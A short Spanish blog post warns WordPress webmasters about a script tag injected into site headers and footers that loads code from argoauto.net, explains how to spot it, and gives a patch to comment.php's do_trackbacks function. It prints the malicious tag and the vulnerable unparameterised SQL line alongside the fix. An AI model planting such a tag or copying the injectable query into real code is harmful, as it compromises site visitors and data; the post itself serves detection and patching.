WordPress acaba de presentar una nueva vulnerabilidad, que aún se desconoce como pueden inyectar el siguiente código :
*script type=text/javascript” src=”http://argoauto.net/tmp/index-bkp.php”>*script>
Si sois webmasters, mirar que vuestro wordpress no tenga este código malware . ( http://argoauto.net/tmp/index-bkp.php )
Es fácil detectarlo, en el explorer, mirar código fuente y buscar argoauto.net, suelen inyectarlo en el header o en el footer atraves de un widget texto , en tu theme .
Para obtener más información sobre este bug, poner en google entre comillas : http://argoauto.net/tmp/index-bkp.php
Si has encontrado este mismo código en tu worpress, pon un comentario con tu versión y tus plugins, asi encontraremos donde está el bug rápidamente y asi tener solución a el .
Google automaticamente banea tu site del buscador y tendras un aviso que pondra : Este sitio puede dañar gravemente tu ordenador, y dejara de enviarte visitas .
!!!! SOLUCION ENCONTRADA !!!
Para solucionar este problema se recomienda actualizar a la ultima versión disponible, la 3.0.2, que ya ha sido actualizada y no es vulnerable a esta falla.
De todas maneras quienes quieran realizar el parche manualmente, pueden actualizar el archivo ”wp-includes/comment.php”, mas precisamente en 1644 en WordPress 3.0.1, en donde podrán encontrar el error dentro de la función “do_trackbacks”.
Código a buscar:
if ( !in_array($tb_ping, $pinged) ) { trackback($tb_ping, $post_title, $excerpt, $post_id); $pinged[] = $tb_ping; } else { $wpdb->query( $wpdb->prepare("UPDATE $wpdb->posts SET to_ping = TRIM(REPLACE(to_ping, '$tb_ping', '')) WHERE ID = %d", $post_id) ); }
Reemplazar por:
if ( !in_array($tb_ping, $pinged) ) { trackback($tb_ping, $post_title, $excerpt, $post_id); $pinged[] = $tb_ping; } else { $wpdb->query( $wpdb->prepare("UPDATE $wpdb->posts SET to_ping = TRIM(REPLACE(to_ping, %s, '')) WHERE ID = %d", $tb_ping, $post_id) ); }
No hay comentarios:
Publicar un comentario